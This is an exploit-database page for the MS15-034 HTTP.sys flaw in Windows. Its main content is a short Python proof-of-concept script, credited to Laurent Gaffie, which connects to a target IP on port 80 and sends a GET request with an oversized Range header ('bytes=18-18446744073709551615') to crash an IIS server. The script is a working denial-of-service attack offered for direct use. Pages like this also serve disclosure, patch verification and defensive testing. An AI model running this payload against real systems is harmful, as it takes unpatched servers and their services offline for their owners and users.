Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)

🗓️ 16 Apr 2015 00:00:00Reported by laurent gaffieType

Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034) tested on Win Server 2012R

#Tested on Win Srv 2012R2.
import socket,sys
 
if len(sys.argv)<=1:	
 sys.exit('Give me an IP')

Host = sys.argv[1]

def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()

#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"

SendPayload(Init, Host)
SendPayload(Payload, Host)

16 Apr 2015 00:00Current

7.4High risk

Vulners AI Score7.4

Microsoft Windows - &#039;HTTP.sys&#039; HTTP Request Parsing Denial of Service (MS15-034)

Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)